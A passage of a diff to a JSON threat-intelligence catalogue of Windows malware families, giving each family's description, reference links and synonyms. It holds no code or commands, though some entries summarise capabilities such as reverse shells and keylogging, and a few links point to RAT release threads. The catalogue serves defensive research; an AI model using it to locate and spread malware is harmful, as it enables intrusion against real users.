in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell", - "https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell" ], "synonyms": [], "type": [] @@ -6775,14 +13053,37 @@ "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836", "value": "DarkShell" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6", + "https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/", + "https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/", + "https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html", + "https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968", + "https://www.acronis.com/en-us/articles/darkside-ransomware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "625bcba0-faab-468e-b5ab-61116cb1b5cf", + "value": "DarkSide" + }, { "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky", "http://telegra.ph/Analiz-botneta-DarkSky-12-30", - "https://blog.radware.com/security/2018/02/darksky-botnet/", - "https://github.com/ims0rry/DarkSky-botnet" + "https://blog.radware.com/security/2018/02/darksky-botnet/" ], "synonyms": [], "type": [] @@ -6817,12 +13118,16 @@ "value": "DarkTequila" }, { - "description": "", + "description": "DtBackdoor", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat", + "https://www.facebook.com/darktrackrat/", + "https://cracked.to/Thread-Release-RAT-Dark-track-alien-4-1", "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml", - "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html" + "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html", + "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf", + "https://www.tgsoft.it/files/report/download.asp?id=7481257469" ], "synonyms": [], "type": [] @@ -6836,6 +13141,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://www.secureworks.com/research/threat-profiles/bronze-butler", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/" ], @@ -6853,9 +13159,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper", - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html" + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/", + "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://www.macnica.net/mpressioncss/feature_05.html/", + "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html", + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf" ], "synonyms": [], "type": [] @@ -6863,11 +13175,62 @@ "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c", "value": "Datper" }, + { + "description": "This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader", + "https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html", + "https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands", + "https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader" + ], + "synonyms": [ + "ModiLoader", + "NatsoLoader" + ], + "type": [] + }, + "uuid": "17e0756b-6cc6-4c25-825c-5fd85c236218", + "value": "DBatLoader" + }, + { + "description": "DCRat is a typical RAT that has been around since at least June 2019.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat", + "https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html", + "https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html" + ], + "synonyms": [ + "DarkCrystal RAT" + ], + "type": [] + }, + "uuid": "b32ffb50-8ef1-4c78-a71a-bb23089b4de6", + "value": "DCRat" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkeylogger", + "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" + ], + "synonyms": [], + "type": [] + }, + "uuid": "78796a09-cac4-47fc-9e31-9f2ff5b8e377", + "value": "DDKeylogger" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/", + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" ], "synonyms": [], @@ -6876,12 +13239,33 @@ "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2", "value": "DDKONG" }, + { + "description": "Also known as Wacatac ransomware due to its .wctc extension.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom", + "https://www.fortinet.com/blog/threat-research/death-ransom-attribution.html", + "https://asec.ahnlab.com/1269", + "https://dissectingmalwa.re/quick-and-painless-reversing-deathransom-wacatac.html", + "https://www.fortinet.com/blog/threat-research/death-ransom-new-strain-ransomware.html", + "https://id-ransomware.blogspot.com/2019/11/wacatac-ransomware.html", + "https://twitter.com/Amigo_A_/status/1196898012645220354", + "https://github.com/albertzsigovits/malware-notes/blob/master/DeathRansom.md" + ], + "synonyms": [ + "deathransom", + "wacatac" + ], + "type": [] + }, + "uuid": "2bc6623a-d7d6-48fc-af79-647648f455aa", + "value": "DeathRansom" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal", - "https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157", "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf", "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html" ], @@ -6891,12 +13275,38 @@ "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58", "value": "Decebal" }, + { + "description": "Defray is ransomware that appeared in 2017, and is targeted ransomware, mainly on the healthcare vertical.\r\n\r\nThe distribution of Defray has several notable characteristics:\r\nAccording to Proofpoint:\r\n\"\r\nDefray is currently being spread via Microsoft Word document attachments in email\r\nThe campaigns are as small as several messages each\r\nThe lures are custom crafted to appeal to the intended set of potential victims\r\nThe recipients are individuals or distribution lists, e.g., group@ and websupport@\r\nGeographic targeting is in the UK and US\r\nVertical targeting varies by campaign and is narrow and selective\r\n\"", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.defray", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", + "https://threatvector.cylance.com/en_us/home/threat-spotlight-defray-ransomware-hits-healthcare-and-education.html", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.proofpoint.com/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals", + "https://www.proofpoint.com/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals", + "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", + "https://www.bleepingcomputer.com/news/security/government-software-provider-tyler-technologies-hit-by-ransomware/", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-dupont", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/" + ], + "synonyms": [ + "Glushkov" + ], + "type": [] + }, + "uuid": "bbc6dbe3-0ade-4b80-a1cb-c19e23ea8b88", + "value": "Defray" + }, { "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas", - "https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas" ], "synonyms": [], "type": [] @@ -6916,12 +13326,27 @@ "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59", "value": "Dented" }, + { + "description": "According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor \u2013 a trick falling under the \u201cPort Monitors\u201d technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the \u201cWindows Default Print Monitor\u201d name; that\u2019s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.\r\n\r\nDePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deprimon", + "https://www.welivesecurity.com/2019/11/21/deprimon-default-print-monitor-malicious-downloader/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "17429ed4-6106-4a28-9a76-f19cd476d94b", + "value": "Deprimon" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog", - "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html", + "https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" ], "synonyms": [], "type": [] @@ -6943,13 +13368,37 @@ "value": "DeriaLock" }, { - "description": " A DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", + "description": "DeroHE is a ransomware that was spread to users after IObit, a Windows utility developer, was hacked. The malware is delivered a DLL that is sideloaded by a legitimate, signed IObit License Manager application.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.derohe", + "https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d348373e-df43-4916-ac23-4f6e344c59e1", + "value": "DeroHE" + }, + { + "description": " A DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", - "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", + "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "https://web.archive.org/web/20151216071054/http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family", + "https://web.archive.org/web/20180310053107/https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf", + "https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/" ], "synonyms": [ "PHOTO" @@ -6971,18 +13420,44 @@ "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631", "value": "Devil's Rat" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexbia", + "https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf" + ], + "synonyms": [ + "CONIME" + ], + "type": [] + }, + "uuid": "4792fe0d-5c2f-44b1-861a-4b0501ccd335", + "value": "Dexbia" + }, + { + "description": "Dexphot is a cryptominer Malware attacking windows machines to gain profit from their resources. It implements many techniques to evade common security systems and a file-less technology to become inject malicious behavior. According to Microsoft the Dexphot It hijacked legitimate system processes to disguise malicious activity. If not stopped, Dexphot is equipped by monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexphot", + "https://www.microsoft.com/security/blog/2019/11/26/insights-from-one-year-of-tracking-a-polymorphic-threat/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b9f6de53-13b3-4246-96d5-010851c75bdb", + "value": "Dexphot" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter", - "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", - "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html", "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/", + "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", "http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html", - "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf", - "https://blog.fortinet.com/2014/03/10/how-dexter-steals-credit-card-information", - "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/", + "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html" ], "synonyms": [ "LusyPOS" @@ -6997,12 +13472,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground", + "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/", + "https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/", + "https://www.group-ib.com/media/iran-cybercriminals/", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/", - "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/" + "https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" ], "synonyms": [ "Arena", - "Crysis" + "Crysis", + "Wadhrama", + "ncov" ], "type": [] }, @@ -7015,10 +13505,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox", "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", + "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/", "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", - "https://www.scmagazine.com/inside-diamondfox/article/578478/", "https://blog.cylance.com/a-study-in-bots-diamondfox", - "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/" + "https://fr3d.hk/blog/diamondfox-bank-robbers-will-be-replaced", + "https://www.scmagazine.com/inside-diamondfox/article/578478/" ], "synonyms": [ "Crystal", @@ -7030,6 +13521,19 @@ "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665", "value": "DiamondFox" }, + { + "description": "APT10's fork of the (open-source) Quasar RAT.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dilljuice", + "https://threatvector.cylance.com/en_us/home/threat-spotlight-menupass-quasarrat-backdoor.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "81c95462-62ba-4182-bba0-707e1f6cc1eb", + "value": "DILLJUICE" + }, { "description": "", "meta": { @@ -7048,8 +13552,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt", - "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/", - "https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf" + "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/" ], "synonyms": [], "type": [] @@ -7057,6 +13560,20 @@ "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", "value": "DirCrypt" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispcashbr", + "https://twitter.com/r3c0nst/status/1232944566208286720", + "https://insights.oem.avira.com/atm-malware-targets-wincor-and-diebold-atms/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9e343fd7-3809-49af-9903-db7daeac339b", + "value": "DispCashBR" + }, { "description": "", "meta": { @@ -7076,20 +13593,65 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack", "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", + "https://content.fireeye.com/m-trends/rpt-m-trends-2017", "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", - "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", - "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", - "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/" + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", + "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://securelist.com/shamoon-the-wiper-copycats-at-work/", + "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf", + "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", + "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/", + "https://malwareindepth.com/shamoon-2012/", + "https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks" + ], + "synonyms": [ + "Shamoon" ], - "synonyms": [], "type": [] }, "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df", "value": "DistTrack" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent", + "https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/", + "https://documents.trendmicro.com/assets/Tech-Brief-New-Fileless-Botnet-Novter-Distributed-by-KovCoreG-Malvertising-Campaign.pdf", + "https://blog.talosintelligence.com/2019/09/divergent-analysis.html", + "https://www.cert-pa.it/notizie/devergent-malware-fileless/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-fileless-botnet-novter-distributed-by-kovcoreg-malvertising-campaign/" + ], + "synonyms": [ + "Novter" + ], + "type": [] + }, + "uuid": "7ca1e2ad-6cf4-44cc-8559-2f71e4fb2801", + "value": "Divergent" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.diztakun", + "https://www.elastic.co/de/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5e73185c-6070-45ed-88de-ed75580582eb", + "value": "Diztakun" + }, { "description": "", "meta": { @@ -7118,11 +13680,38 @@ "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", "value": "DMSniff" }, + { + "description": "DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a \u201cpolicy\u201d file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy", + "https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7c35d10d-b3da-459e-a272-da2ea7cee4c2", + "value": "DneSpy " + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnschanger", + "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "92db05a0-7d7e-40c3-94c8-ce3cd5e36daa", + "value": "DNSChanger" + }, { "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/", "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html", "https://blog.talosintelligence.com/2017/03/dnsmessenger.html" @@ -7145,11 +13734,17 @@ "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html", "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html", + "https://nsfocusglobal.com/apt34-event-analysis-report/", "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.secureworks.com/research/threat-profiles/cobalt-edgewater", + "https://marcoramilli.com/2019/04/23/apt34-webmask-project/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" ], "synonyms": [ "Agent Drable", + "AgentDrable", "Webmask" ], "type": [] @@ -7172,14 +13767,71 @@ "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", "value": "DogHousePower" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.donut_injector", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d713f337-b9c7-406d-88e4-3352b2523c73", + "value": "donut_injector" + }, + { + "description": "Doppelpaymer is a ransomware family that encrypts user data and later on it asks for a ransom in order to restore original files. It is recognizable by its trademark file extension added to encrypted files: .doppeled. It also creates a note file named: \".how2decrypt.txt\".", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", + "https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/", + "https://techcrunch.com/2020/03/01/visser-breach/", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.ic3.gov/Media/News/2020/201215-1.pdf", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c", + 